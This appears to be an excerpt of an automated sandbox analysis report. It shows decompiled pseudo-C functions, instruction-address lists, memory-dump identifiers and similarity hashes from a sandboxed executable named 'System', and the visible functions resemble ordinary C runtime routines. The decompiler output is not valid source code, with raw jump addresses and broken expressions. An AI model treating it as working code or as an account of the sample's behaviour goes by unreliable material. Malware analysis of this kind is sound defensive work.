				__rcx[0xc] = __rcx[0xc] | 0x00000004;
				asm("bt edi, 0xc");
				if (_t62 >= 0) goto 0xe4c83dcf;
				__rcx[0x10] = __rcx[0x10] | 0x00000100;
				asm("bt edi, 0xd");
				if (_t62 >= 0) goto 0xe4c83dda;
				asm("bts dword [ebx+0x14], 0x19");
				if ((dil & 0x00000020) == 0) goto 0xe4c83de7;
				asm("bts dword [ebx+0x14], 0x1b");
				goto 0xe4c83df2;
				if ((dil & 0x00000010) == 0) goto 0xe4c83df2;
				asm("bts dword [ebx+0x14], 0x1c");
				return _t39;
			}

















                                                                                                                                                              0x7ff6e4c83c14
                                                                                                                                                              0x7ff6e4c83c19
                                                                                                                                                              0x7ff6e4c83c29
                                                                                                                                                              0x7ff6e4c83c2e
                                                                                                                                                              0x7ff6e4c83c34
                                                                                                                                                              0x7ff6e4c83c43
                                                                                                                                                              0x7ff6e4c83c45
                                                                                                                                                              0x7ff6e4c83c48
                                                                                                                                                              0x7ff6e4c83c4a
                                                                                                                                                              0x7ff6e4c83c4f
                                                                                                                                                              0x7ff6e4c83c55
                                                                                                                                                              0x7ff6e4c83c5c
                                                                                                                                                              0x7ff6e4c83c67
                                                                                                                                                              0x7ff6e4c83c69
                                                                                                                                                              0x7ff6e4c83c6a
                                                                                                                                                              0x7ff6e4c83c6d
                                                                                                                                                              0x7ff6e4c83c71
                                                                                                                                                              0x7ff6e4c83c74
                                                                                                                                                              0x7ff6e4c83c79
                                                                                                                                                              0x7ff6e4c83c87
                                                                                                                                                              0x7ff6e4c83c92
                                                                                                                                                              0x7ff6e4c83c94
                                                                                                                                                              0x7ff6e4c83c96
                                                                                                                                                              0x7ff6e4c83c98
                                                                                                                                                              0x7ff6e4c83c9a
                                                                                                                                                              0x7ff6e4c83ca1
                                                                                                                                                              0x7ff6e4c83ca8
                                                                                                                                                              0x7ff6e4c83caf
                                                                                                                                                              0x7ff6e4c83cb6
                                                                                                                                                              0x7ff6e4c83cbd
                                                                                                                                                              0x7ff6e4c83cc4
                                                                                                                                                              0x7ff6e4c83cc6
                                                                                                                                                              0x7ff6e4c83cc8
                                                                                                                                                              0x7ff6e4c83cca
                                                                                                                                                              0x7ff6e4c83ccf
                                                                                                                                                              0x7ff6e4c83cd5
                                                                                                                                                              0x7ff6e4c83cda
                                                                                                                                                              0x7ff6e4c83cdf
                                                                                                                                                              0x7ff6e4c83cea
                                                                                                                                                              0x7ff6e4c83cee
                                                                                                                                                              0x7ff6e4c83cf4
                                                                                                                                                              0x7ff6e4c83cff
                                                                                                                                                              0x7ff6e4c83d01
                                                                                                                                                              0x7ff6e4c83d07
                                                                                                                                                              0x7ff6e4c83d0b
                                                                                                                                                              0x7ff6e4c83d0c
                                                                                                                                                              0x7ff6e4c83d10
                                                                                                                                                              0x7ff6e4c83d11
                                                                                                                                                              0x7ff6e4c83d15
                                                                                                                                                              0x7ff6e4c83d16
                                                                                                                                                              0x7ff6e4c83d1a
                                                                                                                                                              0x7ff6e4c83d1b
                                                                                                                                                              0x7ff6e4c83d1e
                                                                                                                                                              0x7ff6e4c83d23
                                                                                                                                                              0x7ff6e4c83d29
                                                                                                                                                              0x7ff6e4c83d2e
                                                                                                                                                              0x7ff6e4c83d38
                                                                                                                                                              0x7ff6e4c83d3c
                                                                                                                                                              0x7ff6e4c83d47
                                                                                                                                                              0x7ff6e4c83d4b
                                                                                                                                                              0x7ff6e4c83d51
                                                                                                                                                              0x7ff6e4c83d55
                                                                                                                                                              0x7ff6e4c83d59
                                                                                                                                                              0x7ff6e4c83d5c
                                                                                                                                                              0x7ff6e4c83d66
                                                                                                                                                              0x7ff6e4c83d68
                                                                                                                                                              0x7ff6e4c83d7a
                                                                                                                                                              0x7ff6e4c83d81
                                                                                                                                                              0x7ff6e4c83d88
                                                                                                                                                              0x7ff6e4c83d8e
                                                                                                                                                              0x7ff6e4c83d90
                                                                                                                                                              0x7ff6e4c83da4
                                                                                                                                                              0x7ff6e4c83da9
                                                                                                                                                              0x7ff6e4c83dab
                                                                                                                                                              0x7ff6e4c83db2
                                                                                                                                                              0x7ff6e4c83db6
                                                                                                                                                              0x7ff6e4c83db8
                                                                                                                                                              0x7ff6e4c83dbd
                                                                                                                                                              0x7ff6e4c83dc2
                                                                                                                                                              0x7ff6e4c83dc6
                                                                                                                                                              0x7ff6e4c83dca
                                                                                                                                                              0x7ff6e4c83dcc
                                                                                                                                                              0x7ff6e4c83dcf
                                                                                                                                                              0x7ff6e4c83dd3
                                                                                                                                                              0x7ff6e4c83dd5
                                                                                                                                                              0x7ff6e4c83dde
                                                                                                                                                              0x7ff6e4c83de0
                                                                                                                                                              0x7ff6e4c83de5
                                                                                                                                                              0x7ff6e4c83deb
                                                                                                                                                              0x7ff6e4c83ded
                                                                                                                                                              0x7ff6e4c83e07

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo$_get_daylight
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 72036449-0
                                                                                                                                                              • Opcode ID: 4610346081526dcf44df376283f073f6da23373f9772cc5f0d4d4299c8234037
                                                                                                                                                              • Instruction ID: 4a63850057d07853571d0aa6e2cd70456bdad608b0c7f1fbaad8090a990370ce
                                                                                                                                                              • Opcode Fuzzy Hash: 4610346081526dcf44df376283f073f6da23373f9772cc5f0d4d4299c8234037
                                                                                                                                                              • Instruction Fuzzy Hash: 8451D03BD9C60382F7654A38D48537A65A0AB48F14F196137CA0EC72F5CE6FF842864B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C41410 Relevance: 6.1, APIs: 4, Instructions: 126COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 21%
                                                                                                                                                              			E00007FF67FF6E4C41410(long long __rbx, signed long long __rcx, void* __rdx, void* __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t39;
				void* _t41;
				signed long long _t52;
				signed long long _t53;
				long long* _t69;
				void* _t89;
				intOrPtr _t90;
				intOrPtr _t94;
				void* _t97;
				signed long long _t98;
				void* _t100;
				void* _t103;
				void* _t104;
				void* _t106;

				_t109 = __r8;
				 *((long long*)(_t106 + 0x20)) = __rbx;
				_t104 = _t106 - 0x47;
				_t52 =  *0xe4ca90a0; // 0x1ae1b17e2973
				_t53 = _t52 ^ _t106 - 0x000000a0;
				 *(_t104 + 0x37) = _t53;
				_t101 = __rdx;
				_t69 = __rcx;
				 *(_t104 - 0x39) = __rcx;
				E00007FF67FF6E4C49E00(_t53, __rcx, _t104 - 0x11, __r8, __rdx);
				_t98 = _t53;
				 *(_t104 - 0x39) = _t53;
				asm("movups xmm0, [esi]");
				asm("movaps [ebp+0x17], xmm0");
				if ( *((long long*)(_t53 + 0x10)) == 0) goto 0xe4c41472;
				r8d = 2;
				E00007FF67FF6E4C4AB00(_t69, _t53, _t101, _t109, _t97);
				r8d =  *((intOrPtr*)(_t104 + 0x17));
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x1f)))) + 0x10))(_t103);
				_t89 =  >=  ?  *((void*)(_t104 + 0x17)) : _t104 + 0x17;
				E00007FF67FF6E4C4AB00(_t69, _t98, _t101,  *((intOrPtr*)(_t104 + 0x27)), _t100);
				_t90 =  *((intOrPtr*)(_t104 + 0x2f));
				if (_t90 - 0x10 < 0) goto 0xe4c414db;
				if (_t90 + 1 - 0x1000 < 0) goto 0xe4c414d6;
				if ( *((intOrPtr*)(_t104 + 0x17)) -  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x17)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c415aa;
				0xe4c623d0();
				asm("movups xmm0, [edi]");
				asm("movups [ebp-0x31], xmm0");
				asm("movups xmm1, [edi+0x10]");
				asm("movups [ebp-0x21], xmm1");
				 *((long long*)(_t98 + 0x10)) = 0;
				 *((long long*)(_t98 + 0x18)) = 0xf;
				 *_t98 = 0;
				_t61 =  >=  ?  *((void*)(_t104 - 0x31)) : _t104 - 0x31;
				 *_t69 = 0xe4c895f0;
				asm("xorps xmm0, xmm0");
				asm("movups [edx], xmm0");
				 *((long long*)(_t104 + 0x17)) =  >=  ?  *((void*)(_t104 - 0x31)) : _t104 - 0x31;
				 *((char*)(_t104 + 0x1f)) = 1;
				_t39 = E00007FF67FF6E4C63F88(_t69, _t104 + 0x17, _t69 + 8, _t98, _t101);
				 *_t69 = 0xe4c89638;
				_t94 =  *((intOrPtr*)(_t104 - 0x19));
				if (_t94 - 0x10 < 0) goto 0xe4c41571;
				if (_t94 + 1 - 0x1000 < 0) goto 0xe4c4156c;
				if ( *((intOrPtr*)(_t104 - 0x31)) -  *((intOrPtr*)( *((intOrPtr*)(_t104 - 0x31)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c415a4;
				0xe4c623d0();
				 *_t69 = 0xe4c89650;
				asm("movups xmm0, [esi]");
				asm("movups [ebx+0x18], xmm0");
				return E00007FF67FF6E4C623B0(_t39, _t41,  *(_t104 + 0x37) ^ _t106 - 0x000000a0);
			}




















                                                                                                                                                              0x7ff6e4c41410
                                                                                                                                                              0x7ff6e4c41410
                                                                                                                                                              0x7ff6e4c41418
                                                                                                                                                              0x7ff6e4c41424
                                                                                                                                                              0x7ff6e4c4142b
                                                                                                                                                              0x7ff6e4c4142e
                                                                                                                                                              0x7ff6e4c41432
                                                                                                                                                              0x7ff6e4c41435
                                                                                                                                                              0x7ff6e4c41438
                                                                                                                                                              0x7ff6e4c41443
                                                                                                                                                              0x7ff6e4c41448
                                                                                                                                                              0x7ff6e4c4144b
                                                                                                                                                              0x7ff6e4c4144f
                                                                                                                                                              0x7ff6e4c41452
                                                                                                                                                              0x7ff6e4c4145b
                                                                                                                                                              0x7ff6e4c4145d
                                                                                                                                                              0x7ff6e4c4146d
                                                                                                                                                              0x7ff6e4c41479
                                                                                                                                                              0x7ff6e4c41481
                                                                                                                                                              0x7ff6e4c4148e
                                                                                                                                                              0x7ff6e4c4149a
                                                                                                                                                              0x7ff6e4c414a0
                                                                                                                                                              0x7ff6e4c414a8
                                                                                                                                                              0x7ff6e4c414bb
                                                                                                                                                              0x7ff6e4c414d0
                                                                                                                                                              0x7ff6e4c414d6
                                                                                                                                                              0x7ff6e4c414db
                                                                                                                                                              0x7ff6e4c414de
                                                                                                                                                              0x7ff6e4c414e2
                                                                                                                                                              0x7ff6e4c414e6
                                                                                                                                                              0x7ff6e4c414ea
                                                                                                                                                              0x7ff6e4c414f2
                                                                                                                                                              0x7ff6e4c414fa
                                                                                                                                                              0x7ff6e4c41506
                                                                                                                                                              0x7ff6e4c41512
                                                                                                                                                              0x7ff6e4c41519
                                                                                                                                                              0x7ff6e4c4151c
                                                                                                                                                              0x7ff6e4c4151f
                                                                                                                                                              0x7ff6e4c41523
                                                                                                                                                              0x7ff6e4c4152b
                                                                                                                                                              0x7ff6e4c41537
                                                                                                                                                              0x7ff6e4c4153a
                                                                                                                                                              0x7ff6e4c41542
                                                                                                                                                              0x7ff6e4c41555
                                                                                                                                                              0x7ff6e4c4156a
                                                                                                                                                              0x7ff6e4c4156c
                                                                                                                                                              0x7ff6e4c41578
                                                                                                                                                              0x7ff6e4c4157b
                                                                                                                                                              0x7ff6e4c4157e
                                                                                                                                                              0x7ff6e4c415a3

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2138705365-0
                                                                                                                                                              • Opcode ID: 1de77ace97c1923a312f6e6869c70dfe0d6ed9907d4ed3d17b7b5fd0b108935b
                                                                                                                                                              • Instruction ID: 95b6c3409685e6f10b644fdb5d9e23d032f799a1e78213ad924aef6501b264fc
                                                                                                                                                              • Opcode Fuzzy Hash: 1de77ace97c1923a312f6e6869c70dfe0d6ed9907d4ed3d17b7b5fd0b108935b
                                                                                                                                                              • Instruction Fuzzy Hash: 3C51A027B54A4289EB00CF39D5843AC2371EB48BD8F409632EA5D83B99DF39E495C346
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C6CA08 Relevance: 6.1, APIs: 4, Instructions: 117pipeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                              			E00007FF67FF6E4C6CA08(void* __edx, long long __rbx, void* __rcx, void* __r8, long long* __r9, long long _a16) {
				signed int _v56;
				signed long long _v76;
				long long _v80;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				char _v112;
				signed int _v120;
				signed long long _v128;
				long long _v136;
				void* __rsi;
				void* __rbp;
				void* _t42;
				void* _t43;
				void* _t45;
				short _t49;
				void* _t53;
				signed long long _t66;
				long long _t69;
				signed long long _t70;
				long long* _t71;
				long long* _t75;
				intOrPtr _t86;
				void* _t105;

				_t54 = __edx;
				_a16 = __rbx;
				_t66 =  *0xe4ca90a0; // 0x1ae1b17e2973
				_v56 = _t66 ^ _t105 - 0x00000080;
				_t75 = __r9;
				r14d = __edx;
				GetFileType(??);
				r15d = 1;
				asm("btr ecx, 0xf");
				if (_t53 != r15d) goto 0xe4c6cb0e;
				 *((intOrPtr*)(__r9 + 8)) = r15w;
				if (__rcx == 0) goto 0xe4c6ca82;
				_v120 = _v120 & 0x00000000;
				if (E00007FF67FF6E4C6CD80(_t66 ^ _t105 - 0x00000080, __rcx,  &_v120, __r8) == 0) goto 0xe4c6cb25;
				_t69 = _v120 - 1;
				 *((long long*)(__r9 + 0x10)) = _t69;
				 *__r9 = _t69;
				r8d = 0x34;
				E00007FF67FF6E4C64A30(_t38, _t54,  &_v112, 0, __r8);
				GetFileInformationByHandle(??, ??);
				if (_t69 == 0) goto 0xe4c6cb29;
				 *((short*)(_t75 + 6)) = E00007FF67FF6E4C6CC48(_t53, _t75, _v112, __rcx, __r8, _t105);
				_t42 = E00007FF67FF6E4C6CBAC(_t41, _t53, _v92, 0);
				 *((long long*)(_t75 + 0x20)) = _t69;
				_t43 = E00007FF67FF6E4C6CBAC(_t42, _t53, _v100, _t69);
				_t86 = _v108;
				 *((long long*)(_t75 + 0x18)) = _t69;
				E00007FF67FF6E4C6CBAC(_t43, _t53, _t86,  *((intOrPtr*)(_t75 + 0x20)));
				 *((long long*)(_t75 + 0x28)) = _t69;
				 *(_t75 + 0x14) =  *(_t75 + 0x14) & 0x00000000;
				if (_v80 != 0) goto 0xe4c6cb01;
				_t70 = _v76;
				if (_t70 - 0x7fffffff > 0) goto 0xe4c6cb01;
				 *(_t75 + 0x14) = _t70;
				goto 0xe4c6cb85;
				_t45 = E00007FF67FF6E4C6C854(_t70);
				 *_t70 = 0x84;
				goto 0xe4c6cb25;
				_t26 = _t86 - 2; // -2
				_t71 = _t26;
				if (_t45 - r15d <= 0) goto 0xe4c6cb38;
				if (_t86 != 0) goto 0xe4c6cb29;
				E00007FF67FF6E4C6C854(_t71);
				 *_t71 = 9;
				goto 0xe4c6cb88;
				GetLastError();
				_t49 = E00007FF67FF6E4C6C7E4(_t53, _t71, _t75);
				goto 0xe4c6cb25;
				 *((intOrPtr*)(_t75 + 8)) = r15w;
				_t73 =  ==  ? 0x2000 : 0x1000;
				 *((short*)(_t75 + 6)) = _t49;
				if (_t71 == 2) goto 0xe4c6cb85;
				_v128 = _v128 & 0x00000000;
				_v136 =  &_v120;
				r9d = 0;
				r8d = 0;
				PeekNamedPipe(??, ??, ??, ??, ??, ??);
				_t64 =  ==  ? 0x2000 : 0x1000;
				if (( ==  ? 0x2000 : 0x1000) == 0) goto 0xe4c6cb85;
				 *(_t75 + 0x14) = _v120;
				return E00007FF67FF6E4C623B0(r15b, _t53, _v56 ^ _t105 - 0x00000080);
			}



























                                                                                                                                                              0x7ff6e4c6ca08
                                                                                                                                                              0x7ff6e4c6ca08
                                                                                                                                                              0x7ff6e4c6ca1e
                                                                                                                                                              0x7ff6e4c6ca28
                                                                                                                                                              0x7ff6e4c6ca2f
                                                                                                                                                              0x7ff6e4c6ca38
                                                                                                                                                              0x7ff6e4c6ca3b
                                                                                                                                                              0x7ff6e4c6ca43
                                                                                                                                                              0x7ff6e4c6ca49
                                                                                                                                                              0x7ff6e4c6ca50
                                                                                                                                                              0x7ff6e4c6ca56
                                                                                                                                                              0x7ff6e4c6ca5e
                                                                                                                                                              0x7ff6e4c6ca60
                                                                                                                                                              0x7ff6e4c6ca72
                                                                                                                                                              0x7ff6e4c6ca7b
                                                                                                                                                              0x7ff6e4c6ca7d
                                                                                                                                                              0x7ff6e4c6ca80
                                                                                                                                                              0x7ff6e4c6ca88
                                                                                                                                                              0x7ff6e4c6ca8c
                                                                                                                                                              0x7ff6e4c6ca98
                                                                                                                                                              0x7ff6e4c6caa0
                                                                                                                                                              0x7ff6e4c6cab7
                                                                                                                                                              0x7ff6e4c6cabb
                                                                                                                                                              0x7ff6e4c6cac7
                                                                                                                                                              0x7ff6e4c6cacb
                                                                                                                                                              0x7ff6e4c6cad4
                                                                                                                                                              0x7ff6e4c6cad8
                                                                                                                                                              0x7ff6e4c6cadc
                                                                                                                                                              0x7ff6e4c6cae1
                                                                                                                                                              0x7ff6e4c6cae5
                                                                                                                                                              0x7ff6e4c6caed
                                                                                                                                                              0x7ff6e4c6caef
                                                                                                                                                              0x7ff6e4c6caf7
                                                                                                                                                              0x7ff6e4c6caf9
                                                                                                                                                              0x7ff6e4c6cafc
                                                                                                                                                              0x7ff6e4c6cb01
                                                                                                                                                              0x7ff6e4c6cb06
                                                                                                                                                              0x7ff6e4c6cb0c
                                                                                                                                                              0x7ff6e4c6cb0e
                                                                                                                                                              0x7ff6e4c6cb0e
                                                                                                                                                              0x7ff6e4c6cb14
                                                                                                                                                              0x7ff6e4c6cb18
                                                                                                                                                              0x7ff6e4c6cb1a
                                                                                                                                                              0x7ff6e4c6cb1f
                                                                                                                                                              0x7ff6e4c6cb27
                                                                                                                                                              0x7ff6e4c6cb29
                                                                                                                                                              0x7ff6e4c6cb31
                                                                                                                                                              0x7ff6e4c6cb36
                                                                                                                                                              0x7ff6e4c6cb3b
                                                                                                                                                              0x7ff6e4c6cb52
                                                                                                                                                              0x7ff6e4c6cb55
                                                                                                                                                              0x7ff6e4c6cb59
                                                                                                                                                              0x7ff6e4c6cb5b
                                                                                                                                                              0x7ff6e4c6cb65
                                                                                                                                                              0x7ff6e4c6cb6a
                                                                                                                                                              0x7ff6e4c6cb70
                                                                                                                                                              0x7ff6e4c6cb75
                                                                                                                                                              0x7ff6e4c6cb7b
                                                                                                                                                              0x7ff6e4c6cb7d
                                                                                                                                                              0x7ff6e4c6cb82
                                                                                                                                                              0x7ff6e4c6cbaa

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                              • Opcode ID: 9be9fce4d4f4d71e195f240899e788c1bf6ddb8645c8f00ebe50e6f7b407e7eb
                                                                                                                                                              • Instruction ID: 2267671aa22c4661e9c0d839691d062e29f5478d75703461ac2e1c0582385719
                                                                                                                                                              • Opcode Fuzzy Hash: 9be9fce4d4f4d71e195f240899e788c1bf6ddb8645c8f00ebe50e6f7b407e7eb
                                                                                                                                                              • Instruction Fuzzy Hash: 33416E2BA6864286FB14DF71D4803BD33B5AB88F58F148076DA0D87689DF3EE445870A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C60820 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 203985260-0
                                                                                                                                                              • Opcode ID: d6ff9972f139bacef62df12ebd7a97088ca08b01fdfb213bb277ac1a358418c2
                                                                                                                                                              • Instruction ID: 52b5a6e6b9b6768309aab2af7bbe4bdcb8e6b280c110d46a69eb2a786fe2691d
                                                                                                                                                              • Opcode Fuzzy Hash: d6ff9972f139bacef62df12ebd7a97088ca08b01fdfb213bb277ac1a358418c2
                                                                                                                                                              • Instruction Fuzzy Hash: BC211A7AA68B82C6E310CF22E44432E7AB4F79DF94F244135DB89A3B54DF39D4018B45
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C549A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 334COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                              			E00007FF67FF6E4C549A0(void* __esi, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r11) {
				void* __rbp;
				void* _t76;
				char _t78;
				void* _t83;
				void* _t85;
				void* _t87;
				void* _t88;
				signed long long _t106;
				signed long long _t107;
				long long _t125;
				long long _t133;
				intOrPtr _t162;
				long long _t167;
				intOrPtr _t170;
				void* _t173;
				void* _t174;
				void* _t177;
				void* _t179;
				long long* _t180;
				void* _t182;
				signed long long _t183;
				void* _t185;
				void* _t192;
				long long _t194;

				_t192 = __r11;
				_t89 = __esi;
				 *((long long*)(_t182 + 0x18)) = __rbx;
				 *((long long*)(_t182 + 0x20)) = __rsi;
				_t180 = _t182 - 0x190;
				_t183 = _t182 - 0x290;
				_t106 =  *0xe4ca90a0; // 0x1ae1b17e2973
				_t107 = _t106 ^ _t183;
				 *(_t180 + 0x180) = _t107;
				_t174 = __rdx;
				_t177 = __rcx;
				_t76 = E00007FF67FF6E4C56500( *((intOrPtr*)(__rcx + 8)));
				if (_t107 != 0) goto 0xe4c54c0f;
				r14d = 0;
				r8d = 0x100;
				E00007FF67FF6E4C64A30(_t76, _t88, _t180 + 0x80, 0, _t185);
				 *((intOrPtr*)(_t183 + 0x38)) = r14d;
				 *((long long*)(_t183 + 0x30)) = _t194;
				 *((intOrPtr*)(_t183 + 0x28)) = r14d;
				 *((long long*)(_t183 + 0x20)) = _t194;
				r9d = 0x100;
				_t78 = E00007FF67FF6E4C564B0(_t180 + 0x80, _t194, _t173);
				if (_t107 != 0) goto 0xe4c54c3c;
				 *((long long*)(_t180 - 0x10)) = _t194;
				 *_t180 = _t194;
				 *((long long*)(_t180 + 8)) = 0xf;
				 *((char*)(_t180 - 0x10)) = _t78;
				if ( *((char*)(_t180 + 0x7f)) != 0) goto 0xe4c54a60;
				E00007FF67FF6E4C4A9A0(_t180 - 0x10, _t180 + 0x80, 0);
				 *((long long*)(_t183 + 0x50)) =  *((intOrPtr*)(_t180 - 0x70));
				 *((long long*)(_t183 + 0x48)) =  *((intOrPtr*)(_t180 - 0x40));
				 *((long long*)(_t183 + 0x40)) =  *((intOrPtr*)(_t180 - 0x3c));
				 *((long long*)(_t183 + 0x38)) =  *((intOrPtr*)(_t180 - 0x38));
				 *((long long*)(_t183 + 0x30)) =  *((intOrPtr*)(_t180 - 0x34));
				 *((long long*)(_t183 + 0x28)) =  *((intOrPtr*)(_t180 - 0x30));
				 *((long long*)(_t183 + 0x20)) =  *((intOrPtr*)(_t180 - 0x2c));
				E00007FF67FF6E4C51070(__esi,  *((char*)(_t180 + 0x7f)), __rbx, _t180 + 0x10, _t180 - 0x10,  *((intOrPtr*)(_t180 - 0x68)),  *((intOrPtr*)(_t180 - 0x60)), _t192);
				_t162 =  *((intOrPtr*)(_t180 + 8));
				if (_t162 - 0x10 < 0) goto 0xe4c54afe;
				if (_t162 + 1 - 0x1000 < 0) goto 0xe4c54af8;
				_t120 =  *((intOrPtr*)(_t180 - 0x10)) -  *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x10)) - 8)) + 0xfffffff8;
				if ( *((intOrPtr*)(_t180 - 0x10)) -  *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x10)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c54c5f;
				0xe4c623d0(_t179);
				if ( *((long long*)(_t180 + 0x20)) == 0) goto 0xe4c54b84;
				_t133 =  *((intOrPtr*)(__rdx + 8));
				if (_t133 ==  *((intOrPtr*)(__rdx + 0x10))) goto 0xe4c54b68;
				 *((long long*)(_t183 + 0x60)) = _t133;
				E00007FF67FF6E4C49E00(_t120, _t133, _t133, _t180 + 0x10, _t177);
				E00007FF67FF6E4C49E00(_t120, _t133, _t133 + 0x20, _t180 + 0x30, _t177);
				 *((long long*)(_t133 + 0x40)) =  *((intOrPtr*)(_t180 + 0x50));
				 *((long long*)(_t133 + 0x48)) =  *((intOrPtr*)(_t180 + 0x58));
				_t125 =  *((intOrPtr*)(_t180 + 0x60));
				 *((long long*)(_t133 + 0x50)) = _t125;
				asm("movups xmm0, [ebp+0x64]");
				asm("movups [ebx+0x54], xmm0");
				asm("movsd xmm1, [ebp+0x74]");
				asm("movsd [ebx+0x64], xmm1");
				 *((long long*)(_t174 + 8)) =  *((long long*)(_t174 + 8)) + 0x70;
				_t83 = E00007FF67FF6E4C56630(_t125);
				goto 0xe4c54b89;
				_t167 = _t125;
				E00007FF67FF6E4C50010(_t83, _t89, _t174, _t167, _t180, _t180 + 0x10);
				_t85 = E00007FF67FF6E4C56630(_t125);
				goto 0xe4c54b89;
				if (_t167 - 0x10 < 0) goto 0xe4c54bc0;
				if (_t167 + 1 - 0x1000 < 0) goto 0xe4c54bbb;
				if ( *((intOrPtr*)(_t180 + 0x30)) -  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x30)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c54c36;
				0xe4c623d0();
				 *((long long*)(_t180 + 0x40)) = _t194;
				 *((long long*)(_t180 + 0x48)) = 0xf;
				 *((char*)(_t180 + 0x30)) = 0;
				_t170 =  *((intOrPtr*)(_t180 + 0x28));
				if (_t170 - 0x10 < 0) goto 0xe4c54c07;
				if (_t170 + 1 - 0x1000 < 0) goto 0xe4c54c02;
